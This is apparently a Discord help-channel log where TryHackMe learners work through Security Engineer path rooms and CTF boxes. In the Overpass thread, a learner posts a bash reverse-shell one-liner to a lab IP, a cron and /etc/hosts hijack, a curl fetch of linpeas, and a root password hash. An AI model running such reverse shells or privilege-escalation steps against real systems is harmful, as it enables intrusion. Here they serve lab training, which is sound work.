i have just won title and 1 day streak

#

😦

broken crescent
#

i won a lot of knowledge, the rest was just a nice bonus where nothing but the free goodies came my way, but idc

#

the only thing grinding my gears about this is that the title locked my access to the advanced dc channels because it replaced my lvl group

ruby badger
#

i finish all the free rooms will anyone support me to premium voucher......... it would be nice i dedicate all my time on tryhackme but without premium its nothing

fair orchid
bronze heron
tranquil siren
rich shale
#

I finished the new Security Engineer path and downloaded my certificate. One day later the progress was partially back to zero (Secure Network Architecture, Traverse and the whole Managin Incidents section). This is fck annoying

thorny edge
#

How can I copy from Windows RDP?

#

I am unable to copy my answer.

#

Please I need help.

#

Room OWASP API SECURITY

heady echo
thorny edge
#

Actually it was working in previous two questions

#

But it stopped ✋️

#

I restarted twice. Let me restart once again

thorny edge
#

Fortunately it works now

bitter lava
bitter lava
#

My wife is out of town for the next couple of nights so I think I will finish up the path

prime lake
#

I’m having the same issue

woeful verge
#

Uh I think I had to copy/paste each part individually and put back together after changing the token

keen solar
#

Once you complete the path, is there anything you receive as verification of completing the path?

scenic elbow
#

You get a certificate of completion, I haven't gotten mine yet, but you will be able to download it on the right hand side of the learning path menu

keen solar
#

ooo ty!

reef crescent
#

I wonder How r u guys getting engaged with tryHackMe ?

digital token
#

Hi guys, can someone give a hint on Task 5 of Active Dirctory hardening. I don't get any output after running the scripts. How can I find the flags?

scenic elbow
digital token
#

Thank you Hiro

reef crescent
digital token
#

Please I need help with Task 2 - Introduction to cryptography. I entered the following command to decrypt quote02:
Openssl aes-256-cbc -pbkdf2 -iter 10000 - d -in quote02 -out decryted_text.txt
But I receive a "bad decrypt" error after I enter the password a!kR3T55.
What can be the issue?

woeful verge
reef crescent
fair orchid
#

Darkreader.

static igloo
#

Hello Everyone! I havent had much exp with api and tips for the Mother's Secret challenge?

#

any tips*

reef crescent
#

You'll find the flag

static igloo
#

Ok will do thank you

iron ridge
#

somebody having problems with the mothers secret challenge? site is not updating, followed different writeups now, but nothing is workinh

reef crescent
iron ridge
#

the mothers secret challenge (alien themed room) : "Exploit flaws found in Mother's code to reveal its secrets."
Trying to "Hitting the routes in the right order makes Mother confused, it might think you are a Science Officer!"
followed different writeups: using burpsuit or curl to POST. Apperently the website should change after this. there you schould get the second flag. well it is not. maybe i am doing something wrong. but atleast two others had the same problem.

neat widget
gloomy karma
#

same question

digital token
#

Please can someone help me with task 8 of the OWASP Top 10-2021? I'm stuck. I'm trying to ssh into the machine 10.10.116.248

digital token
#

What should I do @fair orchid ?

fair orchid
digital token
#

Thank you. But looking at the source code, the folder is /assets, My question now is on which machine?

reef crescent
#

Without a degree or any kind of certification I have to work my @$$ off to b on top 🎩 😎

neat widget
neat widget
# reef crescent U did security+ exam ?

Yeah. In terms of knowledge it's not particularly difficult, just a lot of memorising stuff. Having an industry recognised cert maybe shows you're taking it seriously? I don't know

reef crescent
#

Got it

Thanks though

azure canyon
ashen acorn
#

Depending on your job hunt methods, if HR filtering is there, it can actually help a lot to get past HR to get your resume in the hands of a more technical person. It depends on the country you're in, and the companies you apply to. Not all request Security+ but it does pop up a lot as a requirement or a "nice to have".

loud linden
#

I'm upto 83% with the expectation of finishing over the weekend and I'm loving this path..!

sudden wagon
#

In this Path, for DATH section. It says we should use the Spider app but I'm not finding it on the vm

silk grove
#

@sudden wagon In the AttackBox Open OWASP Zap: Applications > Web > OWASP Zap

/root/Desktop/Tools/Web/OWASP Zap

#

then under Tools > AJAX Spider

loud linden
#

Learning Path Completed and it feel awesome..!

novel cliff
#

That's good

remote moss
#

Can someone help me out with this question? What term refers to an address used to access websites?

remote moss
#

No got through with the answer thank you....

surreal mica
reef crescent
surreal mica
reef crescent
surreal mica
#

But I have it bookmarked. I'm at a point in my life where I wish I had more hours in the day lol

reef crescent
#

Hello everyone..
Have anyone done the "overpass" room ?

strong spade
reef crescent
#

Well I have done everything perfectly but I'm not getting response... after that I followed some write-ups but nothing...

So http.server isn't responding

strong spade
reef crescent
#

Http is expected to give response here but I'm not getting

strong spade
#

What do you mean? Are you serving any document via http.server?

reef crescent
#

Yeah

#

U have done overpass room right?

strong spade
#

Yes, but I don't recall me needing to set up a http server other than to copy lse or linpeas into the target. Do you already have initial access to the box via || ssh key ||?

reef crescent
#

Ok here is details
I have done the first task getting flag in user.txt
Now comes second
I started a python server as u can see in the picture
And created a directory /downloads/src/buildscript.sh
There is a reverse shell in that file
And also started a netcat listener
Also replaced ip of the /etc/hosts of overpass.thm to my own machine

#

What's wrong with this approach

#

?

strong spade
reef crescent
#

Just replaced the ip of overpass.thm

strong spade
#

Got it.

#

Aahh. I remember now.

#

Did you try to acces the file you have served via your browser to confirm that it is accessible?

reef crescent
#

How would I access that

strong spade
reef crescent
#

Ok I downloaded that ... now what to do with that file

strong spade
reef crescent
#

How would I do that

strong spade
#

If I remember correctly, the cron job should run every minute?

strong spade
reef crescent
#

Yes

strong spade
#

If you can ping your attack machine from your VM, and you still do not receive the shell, can you check what is mentioned here?

reef crescent
#

I checked

#

😭 getting frustrated... I'm sitting here since the morning

strong spade
#

You can delete it right after

reef crescent
reef crescent
#

my reverse shell: bash -i >& /dev/tcp/10.10.120.243/1234 0>&1

strong spade
reef crescent
#

so what can i do to make it work ?

strong spade
reef crescent
#

since the morning i have followed at least 5 write-ups and 2 videos ...... i dont know if im dumb or my computer

#

no

strong spade
#

It should be your kali VM or Attackbox IP

reef crescent
strong spade
#

Since you are hosting the build.sh script and you want to execute it on the victim

reef crescent
#

it didnt worked so i tried vpn ip address that didnt work either ..... and nor di my kali machine ip

strong spade
#

In the || /etc/hosts || file, you will put in your tun0 as it is the IP that is seen by the victim machine or VM and it is where you will host the || build.sh script || containing your reverse shell payload.

reef crescent
#

exactly this is what im doing

#

i have done a lot research then i came here to ask

strong spade
reef crescent
#

but i just tried it once and o share here

strong spade
reef crescent
#

its not really connecting

#

i dont think its possible to connect overpass.thm

#

i get buildscript like that

strong spade
reef crescent
#

Hello
With wget I'm trying to get a file that's downloaded on my local machine on /tmp folder
And http server is connected
With ip
So when I try it shows 404 file not found

wget http://10.10.10.10:8000/myfile

#

What am doing wrong I also tried after ip /tmp/myfile but didn't work

strong spade
reef crescent
#

Oh .... I was running http on global.. I thought it doesn't matter

#

Yepp now it worked on /tmp

strong spade
reef crescent
#

Help me

#

@strong spade

strong spade
#

You might want to add --format=sha512crypt in your command.

reef crescent
#

Well I tried but not working

strong spade
#

Have you checked if there are extra trailing spaces in your hash?

strong spade
#

Can you try hashcat --identify <hash or hash file> or nth -t <hash>?

#

Just to check if there is something wrong with the hash.

#

You might have to install name-that-hash though, but it is very useful.

reef crescent
#

$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infjI88U9yUXEVgL.

#

It's the hash if you get time please check it

strong spade
reef crescent
strong spade
#

Ooh.. I remember this room.

#

From which step did you get the hash? Just to make sure it isn't a rabbit hole.

reef crescent
#

I got shell now I'm trying to get root access ...

strong spade
#

Got it.

reef crescent
#

For that this hash is needed to be converted maybe

strong spade
#

Did a one by one comparison of the hash you provided and the one that I have in my notes and a letter seemed to have been inadvertently deleted.

reef crescent
strong spade
#

Can you paste it here?

reef crescent
#

$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infjI88U9yUXEVgL.

strong spade
#

Can you paste here the screen capture of the shadow file?

reef crescent
#

Well I'm teaching in class right now... I can send later....

What it can b missing is after the last dot there were some numbers I thought they aren't required as hash they must b representing some kinda date or anything....

strong spade
#

|| $6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL. ||

strong spade
reef crescent
#

It's D in last line
Thanks for the efforts
I'll send a screenshot when I'm on my laptop

strong spade
#

Please remove or redact this picutre and add || before and after the f word above so as not to spoil it for other users. Thanks!

raven wolfBOT
#

Gave +1 Rep to @reef crescent

strong spade
#

Its part of the learning process. I'm also stuck in LFI for a couple of days now, not including the one I asked a hint for earlier (probably in 10 or more boxes.. 😅).

reef crescent
strong spade
#

No, just helping other learners as we're all in the same boat.

reef crescent
#

And what is robocop bot giving me ???

strong spade
strong spade
reef crescent
strong spade
# reef crescent

What was the user in the line / record where you got the hash?

reef crescent
#

Root

#

The hash was from root

#

Is it have to be from John ?

strong spade
#

You should || su root || then.

reef crescent
#

Oh

#

Stupid me 🤷🤣

fair orchid
reef crescent
#

@strong spade
I have a problem in overpass room

On Target machine I'm trying to get a file with wget
And http server running on the directory where the file is

It just show connecting but after few minutes it says reconnecting

Machine ip is working I can access from the browser with http server on but not on Target machine

reef crescent
fair orchid
#

Can you show a screenshot?

strong spade
#

Aside from sharing a screenshot, have you looked at other means of transferring the file such as netcat?

reef crescent
#

i can access it with browser

#

here goes the target machine

reef crescent
strong spade
#

How about curl?

reef crescent
#

?

#

On Target machine?

strong spade
#

which curl

reef crescent
#

/usr/bin/curl

strong spade
#

Can you try curl -o linpeas.sh http://10.17.69.35:8000/linpeas.sh?

reef crescent
strong spade
reef crescent
#

nope

strong spade
#

Can you cd to the /tmp folder?

#

And run the wget or curl commands there?

#

Though it seems the target machine is not reaching your kali VM

reef crescent
#

yepp same thing with /tmp

strong spade
#

On your kali VM, can you run python3 -m http.server 8000 instead?

reef crescent
#

did and same

#

what possiblly could b wrong ?

#

something wrong with ip ... but its accesseble by the browser

strong spade
#

Can you run sudo ufw status on your kali VM (to check if firewall is turned on)?

reef crescent
#

also i can access it with local like 127.0.0.1/linpeas.sh

strong spade
reef crescent
strong spade
#

There you go

#

Change your port to 2222 or disable it altogether

reef crescent
#

on http server and target machine :8000 to :2222 ?

strong spade
reef crescent
#

hell yeahh .... Thanks you made my day ... its morning i didnt wanted to be stuck in in the whole day ... Thanks ❤️

strong spade
#

Glad I could help. I noticed that your wget and curl commands aren't reaching your http.server and you have permissions in the directory to write files. So the next candidate would be the firewall.

hearty heart
#

In secure network architecture
Could anyone explain the task 5
Why is it there? It's just confusing

prime spire
frigid wave
#

Hi, I need help please.

I work on the Auditing and Monitoring room.

On TASK 6, we tell me "Using aureport, hom many failed logins have occured so far?".

I was run aureport --failed and I found Number of failed logins: 264but when I wrote 264 on input, it's not correct answer.

Can you help me and tell me where my mistake is please?

fair orchid
#

You're so close.

frigid wave
#

Hi @fair orchid, I didn’t solved it.

fair orchid
frigid wave
#

I'll send it to you when I get home 😉Around 9pm I think

fair orchid
#

You got a time zone there?

frigid wave
#

UTC+1 (France)

frigid wave
#

sorry for the delay, here is a screen of my order and the answer

finite meadow
#

what room is this please ?

frigid wave
raven wolfBOT
#

Gave +1 Rep to @fair orchid (current: #2 - 1858)

steel dove
#

hello- im on task 3 in intro to cryptography and i keep getting this error message when i try to decrypt the file

strong spade
steel dove
#

i thought i attached it

#

duh...it would help if i hit send

steel dove
#

nevermind i figured it out ...thank you though

steel dove
#

hello- im stumped on the linux system hardening question. Heres some screenshots

#

thanks in advance

heady echo
steel dove
#

how do i find the target machine

#

ok i figured out the target machine is the active machine ip address but its asking for a password

#

i got it...lol

west girder
#

nice

gusty thistle
#

got an issue with the room vulnersity task 4 , when i use burpsuite to launch a sniper attack to the webserver to know which extension allowed , burpsuite give me the same result for every extensions let me send it here

strong spade
gusty thistle
#

they say the answer is .html

strong spade
gusty thistle
#

i was looking at the wrong thing , thank you

shut urchin
shut hatch
#

Hello guys!! 👋

#

I have a question from the room “Breaching Active Directory”

#

Can anyone help with that please?

strong spade
shut hatch
#

Oh right yeah didn’t know there was a dedicated room for breachingad

#

Thanks

tawdry jetty
#

Hello, I am in the virtualization and containers room in the security engineer path and I am have errors when I try to start mini kube in the Kubernetes section.
the instructions says to run minikube start but I get errors after running the command. Can anyone try and let know if they see the same issue?

small moth
woeful verge
small moth
raven wolfBOT
#

Gave +1 Rep to @small moth (current: #52 - 136)

small moth
elder path
#

anyone could recommend some good reverse engineering resources like free Books, online courses, or tutorials. Thanks in advance!

#

anyone could recommend some good reverse engineering resources like free Books, online courses, or tutorials. Thanks in advance!

gloomy shadow
#

Looks like Kubernetes machine not working properly

strong spade
gloomy shadow
hoary pine
#

@gloomy shadow i saw the same issue a few weeks ago and it looks like the machine still has issues

#

the issue is consistently reproducible by sshing into the machine, running minikube start, then running kubectl get pods

#

and it looks like the minikube start command isn't running properly

dull orchid
#

Hi, I'm in the room Linux System Hardening
In Task 8 This question - What two commands are required to update a Debian system? (Connect the two commands with &&.)
I put apt update && apt upgrade and it doesnn't work can anayone help?

stark condor
green pecan
#

@strong spade

strong spade
green pecan
#

linix

strong spade
#

Linux?

livid ice
#

is it possible to land a job after completing this path or any other path in tryhackme? Many videos and blogs are telling that tryhackme paths or rooms is only beginners, not in-depth lessons

fair orchid
rich halo
#

hey yall i’m doing the security engineer intro and need help on two questions before i can move on. can anyone help?

strong spade
eager brook
#

hi every one

lavish wigeon
#

Hi there, I am at the OWASP Top 10 - 2021 Task 15.
I connected myself as admin successfully, but then I try to inject some php code in the quantity input field, but I don't succeed...
Anyone has a tip here?

red sigil
lavish wigeon
lavish wigeon
#

yes indeed everything is ok thanks 🙂

red sigil
lavish wigeon
#

Hi there, I am kind of blocked in the mother's secret room.
I forged the requests to trigger nostromo and nostromo/mother paths, but first I need to trigger the YAML locker and I don't get how...
I keep getting the "You just hit the wrong route." error message

#

anyone has some tips on that?

#

here is my best guess based on the downloaded file

lavish wigeon
#

[UPDATE] I found all flags except the one for question "What is the hidden flag in the Nostromo route?"

#

that's all good I just found it 😄

kind star
#

Am i dumb or is this the correct thing to do ?
Because it's not working

#

Into Virtualization and Containers module and Docker section

red sigil
silent forum
#

hello

red sigil
kind star
raven wolfBOT
#

Gave +1 Rep to @red sigil (current: #1 - 4142)

river iron
#

sometimes you get repository errors, in which case try "sudo apt-get update && sudo apt-get upgrade"

vital blaze
#

I found a small typo on the Introduction to Cryptography room.

For Task 4 - Diffie-Hellman Key Exchange the text for the tasks mentions Task 2 instead of Task 4 for the downloaded files. Very minor but just thought this is the best place to point this out?

red sigil
gleaming axle
#

In the Virtualization and Container Room of the Security Engineer Path, I am trying to follow along to run minikube, but it is giving me an error. What am I doing wrong?

gleaming axle
red sigil
gleaming axle
#

I have it in split screen. But no matter what I do, it will not find the kubectl on either box. I have even tried to update the package or even install the package but won't do anything. Throws the error.

red sigil
gleaming axle
red sigil
gleaming axle
#

Yes sir

red sigil
#

terminate it and start machine directly from task 6

gleaming axle
red sigil
# gleaming axle Oh. My bad

Whenever you see machine icon in the task header it means that this task has dofferent machine than other tasks 🙂

gleaming axle
#

How do I kill VMs I am not using? It is giving me an error about not being able to start up.

red sigil
#

or press red terminate button from machine info box

gleaming axle
#

I killed the attack box and the other VM, but when I try to start the task 6 vm it says I can only have 3 VMs at one time.

#

nvm. It finally let me deploy

gleaming axle
red sigil
gleaming axle
# red sigil Great job , keep up the good work 🙂

Thanks! I do have a question about setting up AWS for the next room. I am trying to follow along with the instructions but it says to go to IAM, but I don't see that specific one. Is it IAM Identity Center? If so, the screens I am getting are different than the instructions.

raven wolfBOT
#

Gave +1 Rep to @red sigil (current: #1 - 4829)

gleaming axle
red sigil
gleaming axle
#

Thanks for the heads up!

faint cedar
#

Hello,
Wah, I have been away for a while. I was done with all the course, except last 2 modules.
I am trying to tackle Mother's Secrets => I am full blank right now.
Since the attackbox crashed I am taking a few minutes:

My ideas:

  • Check the web source after connecting to first page, just in case.
    => Nothing found.
  • ZAP spider scan, as we did in the previous modules -> Nothing of interest.
  • ZAP active scan -> It crashed so I cannot confirm final result; but halfway through it there were a few vulnerabilities .
  • Ask ChatGPT to explain the file provided; it confirmed what I thought the endpoints were; and helped me understand why it was still returned as wrong.
  • Tried Gobuster directory mode; but it returned an error.

After trying pretty much randomly the paths (is there a proper way to do this?), I found the actual routes:
|| /yaml/ and /api/nostromo and /api/nostromo/mother||
But didn't find the right files.

1/ I feel I did trial and error on the routes; and I am wondering if there was a method/tool that should have helped?
2/ No idea what the next step can be to find out the name of the files to specify in filepath.
3/ No idea what the answers to the question in the labs are (except the first one, but I have no idea how to use it...)
...so I am thinking I am way off in how to complete this.

halcyon halo
#

hi guys im new here i need hackers and spammer friends sendme a PM

paper hull
# faint cedar Hello, Wah, I have been away for a while. I was done with all the course, except...

I just finished those 2 rooms yesterday so here are some hints for the Mother's Secret room since the other one is easier in my opinion and you shouldn't have issues with it:

  • You correctly identified what the routes are. Now you just need to hit them in the right order to progress. Each correct hit will give you hints and directions on the next step. Analyze the hints in the task where the questions are as well as the descriptions on the actual webapp (http://MACHINE_IP).
  • To "hit" the routes you need to send a proper POST request to the route and if all is well you will get a response containing further clues. Lookup on your own what tools are good for this (they are already present on the AttackBox or Kali Linux btw). In the task hints/descriptions you will find the name of the first file that you need to request. The actual route that "contains" this file is also hinted at in the descriptions. The source code has clues how the routes are connected - coupled with the task hints/descriptions, you should be able to deduce what is the first route in this chain and what is the first file.
  • I won't spoil too much on how the POST request should look, it involves setting a parameter in the Body of the request that has to do with a weak spot present in the source code (as you already mentioned, it has to do with a file path).

In any case, if you are struggling with specifying the right file, take another look at the task hints, descriptions and the descriptions on the webapp. When you find out the right 1st file and get the proper response, the next clue will present itself.

Edit: I just realized I replied to a message from May 18th 😄 - I thought this was recent. Anyway, I'll leave this up, someone might find it useful...

swift arrow
#

Anyone here prepping for Python basics / Security+ / THM modules / AZ-900 and wants to form a beginner study group?

woeful verge
open moon
#

Has anyone faced a bad decrypt problem on Introduction to Cryptography’s Task 2? I am trying to decrypt the quote02, using openssl but I get a bad decrypt error. Any ideas why the decryption fails? I am sure about the correctness of the decryption key

trim hollow
#

Hi I’m into security and engineering

red sigil
trim hollow
#

Thanks

nimble lark
#

Virtualization and Containers

Had issues with the Kubernetes tasks. Specifically finding the exposed port of the service. kubectl get services -A was not showing the service needed and so I could not find the answer to the question. Had to look online for it :/

red sigil
nimble lark
#

OWASP API Security Top 10 - 1
Task 4 | Vulnerability II - Broken User Authentication (BUA)

I have made a post request and got the token for sales@mht.com. Not sure where to put this token. I believe I need to put it in an authorization header, inside a get request which I send to /user/details. However, I keep getting 403 forbidden error messages being returned, stating cause: "authHeaderNotSet"

#

Managed to find an answer from a previous message. The header should be Authorization-Token and not Authorization. I overlooked this detail in the task. 🤦‍♂️

raven flicker
#

quick question at the end of this learning path i got some points for the last room completion, then next screen a notification that i got 3200 something was that points or xp? it feels it was xp just double checking

red sigil
raven flicker
#

thank you! for a brief moment i got excited over nothing 😂 🤦‍♂️

nimble lark
#

Logging for Accountability | Task 6

I have started the machine and gave it 5+ minutes. When opening the link to the Splunk application there is no data inside of it, so I cant answer the questions. There are no files provided either for me to upload any logs 🤔

#

This is all I see 😅

radiant echo
nimble lark
radiant echo
nimble lark
nimble lark
raven wolfBOT
#

Gave +1 Rep to @radiant echo (current: #11 - 883)

devout glade
#

Hey guys, I’m new to cyber and i’m interested in becoming a Security Engineer, wondering whether i could get some advice where to start from, how to get there and etc, i have intermediate python knowledge and that’s pretty much it. Thanks in advance.

radiant echo
nimble lark
#

Just completed this path, onto the next 🎉

raven wolfBOT
#

Gave +1 Rep to @radiant echo (current: #11 - 897)

pine cargo
#

Quick question, in the Secure Network Architecture room, it's talking about Open vSwitch and there's no AttackBox present in this room. Does that mean I need to download it and figure out how to set it up before carrying onward?

pine cargo
weary pawn
#

is the ssdlc room bugged for anyone else third question wont accept the correct answer

flat cloud
#

Hi, i am stuck on the last question of task 8 (linux hardening room) I mounted secretvault.img to myvault after opening it with cryptsetup, but there are no sources.list files. ls shows only lost+found and task3-flag.txt, What am I missing?

raw folio
#

hello, someone can help for harassments after hack by peoples.. ?

strong spade
dusky bronze
#

Do we need DSA to become Security Engineer?

ornate oak
#

Room: Linux System Hardening, Topic: Update and Upgrade Policies, Issue: hidden flag in /etc/apt/sources.list seems to be missing.

rocky yacht
wheat crater
#

SAME here, no flag in any sources.list file

flat oyster
#

I guess no one wants to go down the security engineer path lol. Anyway, I started it today

sturdy shadow
safe hearth
#

Hi All!
Anyone working on SecDecOps course? and to collaborate or share some guidance on a couple roadblocks I am running into.

indigo prawn
#

Hello there, I have just a question about some certifications. Will be in the future some Certificaton for Cloud Security or Security engineers?

strong spade
strong spade
carmine bane
#

hello guys

vocal jasper
#

Hi, I want to go into security engineering. I have some experience in secure programming and operating systems during uni study, and pretty much built up some hands on experience doing ctfs and thm. wondering if anyone has any good resources like books or yt channels or is willing to guide me : )

true veldt
#

Governance & Regulation
Anybody knows the issue with Task 8 ?

strong spade
alpine hatch
#

I s there something is wrong with question 2 Task 2 - I put in [openssl aes-256-cbc -pbkdf2 -d -in quote02 -out or1_msg.txt ] - GETTING
bad decrypt
40E715B42A7B0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:124:

ebon garnet
#

I’m looking for someone skilled in reverse engineering I’m paying good money

stuck maple
#

Hi just wondering do you need to be in the cybersecurity to learn cybersecurity engineering if you come from a different background? I am wondering which part of engineering doing coding

rain birch
#

Not sure about coding. I didn't see any coding rooms in that path. It's more close to DevSecOps and Cloud Security.

stuck maple
raven wolfBOT
#

Gave +1 Rep to @rain birch (current: #1452 - 4)

fleet nexus
#

How come there's no change management module on this path

dusk fog
#

um

tight impBOT
#
Pong!
API Latency

123ms

Client Ping

217ms

#
TryHackMe
Ollie
hybrid jacinth
#

Can someone give me the answers to task 6 & 7 to the threat modeling portion? I'm stuck and I just want it to be completed.

indigo prawn
#

Will be on THM any Security Engineer Certification? Anything with hands-on practice?